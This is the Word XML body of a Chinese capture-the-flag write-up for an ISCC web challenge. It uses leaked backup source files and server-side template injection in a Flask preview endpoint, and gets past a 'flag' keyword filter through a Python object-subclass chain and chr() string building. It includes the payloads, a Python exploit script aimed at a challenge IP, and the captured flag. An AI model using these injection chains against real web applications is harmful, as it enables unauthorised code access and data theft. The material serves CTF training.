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ader-n0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Solution</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="9" w:name="header-n3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">源码泄露与框架确认</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在浏览器中打开靶机首页，能够从页面源码里发现如下注释信息：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!-- notes: index.php.bak, app.py.bak --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">经测试发现，上述提及的备份文件并未存放在网站根路径下，其真实访问路径为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/backup/index.php.bak</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/backup/app.py.bak</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">审查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">app.py.bak</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件的内容，可以发现服务端在后台定义了一个包含各类信息的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">doc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据字典：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build_doc():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'关于进一步规范企业公文套红预览流程的通知'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'企业信息化办公室'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'doc_no'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'信办发〔2026〕12号'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'2026-02-24'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'预览服务仅用于内部版式核对，正式发文前仍需复核内容与编号。'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'flag'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'*+*+*+*'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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">index.php.bak</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">源码里，留有一段非常重要的思路指引：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$compat_note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"输入内容一定要按照模板来，有一套模板就足够了；如果字符显示出了问题，还是按老办法从空字符串对象''一路往上看，不要投机取巧跳过步骤，按最基本的来就行。"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另外，通过抓包查看</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应头，可以观察到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字段包含了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Werkzeug/Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字样，由此可判定目标系统采用了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">作为其后端</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">架构。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="10" w:name="header-n13"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">验证模板表达式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/preview</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接口发起</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">形式的请求，并传入名为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tpl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的参数以测试漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">首先尝试读取非敏感的常规键值：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{{doc.get('title')}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此时页面能正常回显公文的标题内容：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关于进一步规范企业公文套红预览流程的通知</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接着尝试直接获取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的值：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{{doc.get('flag')}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发现请求遭到了后端的阻断，这表明服务器端确实配置了针对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这一关键词的拦截策略。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:bookmarkStart w:id="11" w:name="header-n22"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用对象链绕过黑名单</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">遵照前文所获源码里的线索，我们以空字符串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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为起点逐步向上层基类进行回溯：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{{''.__class__.__base__.__subclasses__()}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在回显的所有子类列表当中，能够找到一个较为特别的类名：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BuiltinBridge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">该类刚好处于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__subclasses__()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回数组的索引</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 117 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">处。我们进一步利用它来提取其初始化方法内的全局命名空间：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{{''.__class__.__base__.__subclasses__()[117].__init__.__globals__}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">页面将返回如下的内置属性结果：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'__builtins__'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'chr'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built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function </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">chr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}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这意味着我们成功获取到了内置函数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的调用权限。借助</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">chr()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASCII </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">码转换为字符的特性，我们就能在不触发敏感词检测的前提下，动态组装出所需的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字符串，进而完美避开对明文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的限制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">能够实现上述漏洞利用全过程的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本代码如下所示：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"http://39.105.213.28:49104/preview"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"''.__class__.__base__.__subclasses__()[117].__init__.__globals__['__builtins__']['chr']"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doc.get(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(102)+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(108)+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(97)+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(103))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chain,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    chain,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    chain,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    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"tpl"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: payload},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r"&lt;pre&gt;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&lt;/pre&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, resp.text, re.S)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(html.unescape(match.group(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)).strip())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在该脚本中，对应的字符</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASCII </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">码转换关系为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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br/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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">因此，经过转换后的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最终发挥的作用等同于执行了如下代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">doc.get(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运行该脚本，即可得到目标输出：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ISCC{enterprise_red_doc_preview}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkStart w:id="13" w:name="header-n40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ISCC{enterprise_red_doc_preview}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:id="14" w:name="header-n42"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">EXP运行截图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pP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2026-05-16T03:57:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-16T03:57:05Z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